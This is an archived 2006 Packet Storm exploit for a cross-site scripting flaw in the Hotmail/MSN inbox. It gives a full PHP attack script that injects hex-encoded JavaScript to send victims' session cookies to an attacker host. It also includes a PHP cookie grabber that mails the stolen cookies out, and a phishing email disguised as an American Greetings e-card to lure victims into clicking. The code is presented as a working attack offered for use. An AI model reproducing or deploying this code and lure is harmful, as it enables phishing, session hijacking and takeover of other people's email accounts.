HotmailCookieXploit.txt

2006-02-26T00:00:00
ID PACKETSTORM:44197
Type packetstorm
Reporter Simo64
Modified 2006-02-26T00:00:00

Description

                                        
                                            `/* Hotmail/MSN Cross Site Scripting Exploit  
  
Author: Simo Ben youssef aka _6mO_HaCk  
Contact: Simo_at_morx_dot_org  
Discovered: September 15 2005  
Published: February 20 2006  
Vendor: MSN.com  
Service: Hotmail.com Webmail Service  
Vulnerability: Cross Site Scripting (Cookie-Theft)  
Severity: Medium/High  
Tested on: IE 6.0 (designed for) firefox 1.5 and Opera (should work on all  
browsers)  
Original Advisory/Xploit: http://www.morx.org/HotmailCookieXploit.txt  
Morx Security Research Team  
http://www.morx.org  
  
Description:  
  
Exploit written in PHP to exploit the $a variable cross site scripting  
vulnerability inside Hotmail/MSN inbox. Exploit requires the victim to  
open the email sent by the attacker and click on a URL, therefore some  
Social Engineering skills are required too  
  
Notice: if you dont know what's cross site scripting or/and how its being  
exploited then just stop reading by here as you will have to modify some  
things on the exploit to make it work for you, but if you insist then good  
luck.  
  
Exploitation:  
  
Exploiting this flaw seemed to be almost impossible on Internet Explorer  
Browsers, because the vulnerable variable resides inside the hotmail inbox  
and its value has to be correct and we cant avoid it, replace it or guess  
it in anyway, at this point it was ok while it was possible to get the  
victim click on the url and grab the entire HTTP referrer add our  
malicious code at the end of the variable value and redirect the victim  
back to the HTTP referrer with one single script, this worked just fine on  
firefox while it didnt work on IE beacause hotmail filters <a href=""> and  
replace it with javascript:ol(); so the link opens a new internet explorer  
window, and of course when IE opens another window it doesnt send the HTTP  
referrer where from the link was opened previously, so one way to exploit  
this was to insert an <img src=""> and make it point to a php script  
in order to grab the HTTP referrer of the victim, reconstruct it, add  
javascript code at the end of the $a variable value and then open another  
php script in the same server and write on it some php code to make an  
automatic redirection to the re constructed HTTP referrer when the victim  
clicks on the second link, and therefore get the malicious code executed  
which will grab the user authentification cookie and send it to the  
attacker script giving the attacker full access to the victim inbox for 24  
hours, which's the default time set in hotmail for cookie expiration :)  
  
Exploiting this vulnerability can be done by uploading the following  
script to a php enabled webserver then send an email to the victim with  
<img src="http://www.attacker-server.com/a.php"> where a.php is the php  
exploit file name and <a  
href="http://http://www.attacker-server.com/ecard.php"> is the link of the  
second script (the one that get created by a.php) as i said some Social  
Engineering skills are required, so as an example the email can be sent as  
a greeting card with the following HTML code, you may also need to modify  
some things on the php exploit to make it fit your needs.  
Hello, </p>  
Jennifer has just sent you a greeting card. </p>  
To view your greeting card, click on the link below: </p>  
<a href="http://attacker-site/ecard.php"> http://  
lycos.americangreetings.com/view.pd?i=197489639&m=8381&rr=y&source=lycos  
</a> </p>  
Or copy and paste the above link into your web browser's address window</p>  
Or enter this eCard number 9584B7E784 on our eCard Pick Up page at  
www.americangreetings.com</p>  
Thanks for using Lycos Greetings with AmericanGreetings.com  
<img src="http://attacker-site/a.php"></img>  
  
as a cookie grabber you may use the following code:  
  
$cookie = $_GET['cookie'];  
$ip = getenv("REMOTE_ADDR");  
$msg = "Cookie: $cookie\nIP Address: $ip";  
$subject = "cookie";  
mail("your@email.org", $subject, $msg);  
  
header ("location:  
http://www.americangreetings.com/view.pd?i=405014155&m=6355&source=ag999");  
  
at the end i would like to say a big thanks to mat  
(mattzew5_at_hotmail_dot_com) for helping me research and test this  
exploit, it took several days of research to exploit this flaw, so once  
again thanks mat  
  
greets to all MorX members and especially to BlooDMASK even though he  
refused to let me test this on his hotmail account, certainly thats  
because he has some nice xxx passwords on it :) also greets to barbenoir  
(boule7ia), th3-brain, Dragos and everybody else.  
  
Why am i publishing this late ?  
  
because i found better flaws in hotmail which i wont be releasing anytime  
soon :)  
  
Workaround:  
  
avoid clicking on links while being autentified.  
  
Disclaimer:  
  
this entire document is for eductional, testing and demonstrating purpose  
only. Modification use and/or publishing this information is entirely on  
your OWN risk. The information provided in this advisory is to be  
used/tested on your OWN machine/Account. I cannot be held responsible for  
any of the above.  
  
------------------------ Hotmail/MSN accounts XSS Xploit by Simo Ben  
youssef ---------------------- */  
  
<?php  
  
/* file name of the script that's the victim will visit  
make sure your webserver has writting permissions  
otherwise create ecard.php manualy and chmod it to 777 or whatever */  
  
$file = "ecard.php";  
  
// get the http referrer that we get with <img  
  
$HTTP_REFERER = getenv("HTTP_REFERER");  
  
$host = $HTTP_REFERER;  
  
// reconstruct the http referrer  
  
// get the &curmbox string position  
  
$first = strpos($host, '&curmbox');  
  
// get the first url part based on $curmbox position  
  
$firstpart = substr($host, 0, $first);  
  
// get the second url part  
  
$secondpart = substr($host, $first);  
  
/* split the second part and list the first  
two variables since hotmail dublicate those sometimes */  
  
list($a, $b, $c) = split('[&]', $secondpart);  
  
// put all the above together  
  
$target = "$firstpart&$a$b&$c";  
  
$fo = fopen($file, 'w+');  
  
// change this to your cookie grabber address, dont include "http://" as  
its already included in hex  
// the variable name for the cookie grabber should be included too  
  
$d = 'www.attacker-site.com/cookie-grabber.php?cookie';  
  
// first javascript hex code  
  
$e =  
'%22%3E%3C%73%63%72%69%70%74%3E%64%6F%63%75%6D%65%6E%74%2E%6C%6F%63%61%74%69%6F%6E%3D%27%68%74%74%70%3A%2F%2F';  
  
// second javascript hex code  
  
$f =  
'%3D%27%2B%65%73%63%61%70%65%28%64%6F%63%75%6D%65%6E%74%2E%63%6F%6F%6B%69%65%29%2E%73%75%62%73%74%72%28%30%2C%31%39%30%30%29%3C%2F%73%63%72%69%70%74%3E';  
  
// convert the cookie grabber url to hex code and add "%" at the first of  
each hex caracter  
  
$converted = bin2hex($d);  
  
$converted = chunk_split($converted, 2, '%');  
  
$converted = '%' . substr($converted, 0, strlen($converted) - 1);  
  
$data = '<?php header ("Location: ' . $target . '' . $e . '' . $converted  
. '' . $f .'"); ?>';  
  
/* write the data that would redirect the victim to the reconstructed http  
referrer and exploit the vulnerable variable and make the cookie  
redirection */  
  
fwrite($fo, $data);  
  
fclose($fo);  
  
?>  
`